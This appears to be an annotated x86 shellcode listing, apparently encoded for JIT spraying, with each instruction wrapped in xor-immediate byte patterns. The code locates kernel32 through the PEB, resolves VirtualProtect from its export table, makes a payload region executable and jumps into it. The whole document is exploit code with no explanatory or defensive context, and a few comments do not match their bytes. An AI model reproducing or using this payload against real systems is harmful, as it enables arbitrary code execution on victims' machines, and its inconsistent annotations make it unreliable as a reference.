3583ec443c  sub esp, 44
3533C0903c  xor eax, eax
35b030903c  mov AL,  30
35648b003c  mov eax, fs:[eax]
358b400c3c  mov eax,  fs:[eax+C]
358b401c3c  mov eax,  fs:[eax+1C]
358b50083c  mov edx,  [eax+08]
358b78203c  mov edi,  [eax+20]
358b00903c  mov eax,  [eax]
35803f6b6a  cmp [edi],  'k'
3575eA903c  jnz short  'mov edx,dword ptr [eax+08]'
354747903c  inc edi, inc edi
35803f656a  cmp [edi],  'e'
3575ef903c  jnz short  'JNZ'
354747903c  inc edi, inc edi
35803f726a  cmp [edi], 'r'
3575ef903c  jnz short  'JNZ'
354747903c  inc edi, inc edi
35803f6e6a  cmp [edi], 'n'
3575ef903c  jnz short  'JNZ'
359090523c  push edx
3583c23c3c  add edx,  3c  
358b3a903c  mov edi,  [edx]
358b14243c  mov edx,  [esp]
3503d7903c  add edx,  edi
3583c2783c  add edx,  78 
358b3a903c  mov edi,  [edx]
358b14243c  mov edx,  [esp]
3503d7903c  add edx,  edi
3583c2183c  add edx,  18
358b3a903c  mov eax,  [edx]  ; eax -numbers
3583c2043c  add edx,  4
358b1a903c  mov ebx,  [edx]   
35031c243c  add ebx,  [esp]   ; ebx - addr with adresses of funcs
3583c2043c  add edx,  4
358b32903c  mov esi,  [edx]   
350334243c  add esi,  [esp]   ; esi - addr with adresses of names
3583c2043c  add edx,  4
358b0a903c  mov ecx, [edx]   
35030c243c  add ecx, [esp] ; ecx - addr ord
359090b83c
350000903c
35b063903c
35b474503c		; ct\0\0
359090b83c
357465903c
35b072903c
35b46f503c		; rote 
359090b83c
356c50903c
35b075903c
35b461503c		; ualP
359090b83c
357274903c
35b056903c 
35b469503c		; push  'VirtualProtect\0\0' 
358bd7903c  mov edx, edi
3533C0903c  xor eax, eax
3533ff903c  xor edi edi   
355651533c  push regs
359090903c  nop
359090903c  nop
359047573c  inc edi, push edi
358b04243c  mov eax, [esp]
35c1e0023c  shl eax, 2
3503f0903c  add esi, eax
358b06903c  mov eax, [esi]
3583c4203c  add esp, 20
350304243c  add eax,[esp]
3583ec203c
3533c9903c  xor
35b10e903c  mov cl,e  ; length of 'VirtualProtect\0'
3583c4103c  add esp, 10  ; [esp] - what we try to find, eax - what we have in current
358bf4903c  mov esi, esp 
358bf8903c  mov edi,  eax
3583c4183c  add esp, 18
35f3a6906a  repe cmps [esi], [edi]
3574149014  jz ---
3583ec243c  sub esp, 24
355f5b593c  pop ... EDI EBX ECX ESI
355e90903c
35eb90903c  jmp loop
3583ec243c  sub esp, 24
355f5b593c  pop ... EDI EBX ECX ESI
355e90903c
35d1e7903c  shl ecx,1
3503cf903c  add ecx, edi
3533c0903c  xor eax,  eax
35668b013c  mov ax, word ds:[ecx]
35c1e0023c  shl eax, 2
3503c3903c  add eax, ebx
358b18903c  mov ebx,  [eax]
3583c4103c  add esp, 10
35031c243c  add ebx, [esp]  ; ebx - pointer on VirtualProtect()
3583c45c3c  add esp, 5c  	; esp - address from string             
355890903c  pop eax          ; restore high values of shellcode addr
3583c4083c  add esp, 08		;esp - points to low values
355a90b93c  pop edx				;restore low values
356060903c  
35b160903c
35b560903c  mov ecx, 60606060
352bc1903c  sub eax, ecx
352bd1903c  sub edx, ecx  		;low bytes restored fuly
35c1e0043c  shl eax, 4			;high bytes restored fully
3503c2903c  add eax,edx			;full address
358b38903c  mov edi, [eax]  ; get string address
3583c7083c  add edi, 8		; eax - point to shellcode now
35546a403c  push esp and push 01 
356a01903c  push 22 
3557ffd33c  push edi and call VirtualProtect and jmp edi ; make executable and then jump
35ffe7903c  and then jump